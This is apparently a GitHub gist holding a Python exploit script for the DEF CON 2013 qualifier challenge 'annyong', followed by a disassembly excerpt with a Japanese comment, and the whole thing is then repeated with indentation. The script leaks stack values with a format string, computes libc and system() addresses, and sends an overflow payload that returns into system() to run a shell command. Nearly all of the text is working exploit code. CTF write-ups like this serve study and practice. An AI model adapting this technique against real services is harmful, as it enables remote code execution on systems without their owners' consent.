eggpod/gist:9026240

## gistfile1.py
# coding:utf8
# defcon2013pre annyong
from socket import *
from struct import *

sock =socket(AF_INET, SOCK_STREAM)
sock.settimeout(5)
sock.connect(("192.168.189.131", 7788))
fmt = ""
for i in xrange(11):
	fmt += "%%%d$016llX " % (2060/8+i)
sock.sendall(fmt+"\n")
r=sock.recv(1000)
r=map(lambda x: int(x,16), r.split(" ")[0:-1])

for i in xrange(len(r)):
	print i, "%016X" % r[i]

print "----"

ret_pos = 2060/8+64/8
saved_rbp = r[7]
libc_ret = r[10]
libc_base = libc_ret-0x02176D
system_addr = libc_base+0x45660
ret_spam = libc_base+0x45699

cmd_pos = 1000
fmtmsg_addr = saved_rbp-2080
cmd_addr = fmtmsg_addr+cmd_pos

fmt = "%%%d$016llX %%%d$016llX system('%%%d$s')" % (ret_pos,ret_pos+2,ret_pos+2)
cmd = "ls -la"

data = fmt
data += "\x00"*(cmd_pos-len(fmt))
data += cmd+"\x00"
data += "1"*(2072-len(data))
data += pack("5Q", system_addr+0x3f, 0, cmd_addr,0,libc_ret)
print hex(system_addr+0x3f), hex(cmd_addr)
sock.sendall(data+"\n")
print sock.recv(1024)
print sock.recv(1024)

"""
.text:000000000004569A     mov     [rsp+8], rdi
.text:000000000004569F     call    LIBC_CANCEL_ASYNC <=============== ここに飛ぶ。
.text:00000000000456A4     mov     rdi, [rsp+8]
.text:00000000000456A9     mov     ebx, eax
.text:00000000000456AB     call    do_system
.text:00000000000456B0     mov     edi, ebx
.text:00000000000456B2     mov     dword ptr [rsp+18h+var_10], eax
.text:00000000000456B6     call    LIBC_CANCEL_RESET
.text:00000000000456BB     mov     eax, dword ptr [rsp+18h+var_10]
.text:00000000000456BF     jmp     short loc_45694
.text:00000000000456BF system endp
"""
	# coding:utf8
	# defcon2013pre annyong
	from socket import *
	from struct import *

	sock =socket(AF_INET, SOCK_STREAM)
	sock.settimeout(5)
	sock.connect(("192.168.189.131", 7788))
	fmt = ""
	for i in xrange(11):
	fmt += "%%%d$016llX " % (2060/8+i)
	sock.sendall(fmt+"\n")
	r=sock.recv(1000)
	r=map(lambda x: int(x,16), r.split(" ")[0:-1])

	for i in xrange(len(r)):
	print i, "%016X" % r[i]

	print "----"

	ret_pos = 2060/8+64/8
	saved_rbp = r[7]
	libc_ret = r[10]
	libc_base = libc_ret-0x02176D
	system_addr = libc_base+0x45660
	ret_spam = libc_base+0x45699

	cmd_pos = 1000
	fmtmsg_addr = saved_rbp-2080
	cmd_addr = fmtmsg_addr+cmd_pos

	fmt = "%%%d$016llX %%%d$016llX system('%%%d$s')" % (ret_pos,ret_pos+2,ret_pos+2)
	cmd = "ls -la"

	data = fmt
	data += "\x00"*(cmd_pos-len(fmt))
	data += cmd+"\x00"
	data += "1"*(2072-len(data))
	data += pack("5Q", system_addr+0x3f, 0, cmd_addr,0,libc_ret)
	print hex(system_addr+0x3f), hex(cmd_addr)
	sock.sendall(data+"\n")
	print sock.recv(1024)
	print sock.recv(1024)

	"""
	.text:000000000004569A mov [rsp+8], rdi
	.text:000000000004569F call LIBC_CANCEL_ASYNC <=============== ここに飛ぶ。
	.text:00000000000456A4 mov rdi, [rsp+8]
	.text:00000000000456A9 mov ebx, eax
	.text:00000000000456AB call do_system
	.text:00000000000456B0 mov edi, ebx
	.text:00000000000456B2 mov dword ptr [rsp+18h+var_10], eax
	.text:00000000000456B6 call LIBC_CANCEL_RESET
	.text:00000000000456BB mov eax, dword ptr [rsp+18h+var_10]
	.text:00000000000456BF jmp short loc_45694
	.text:00000000000456BF system endp
	"""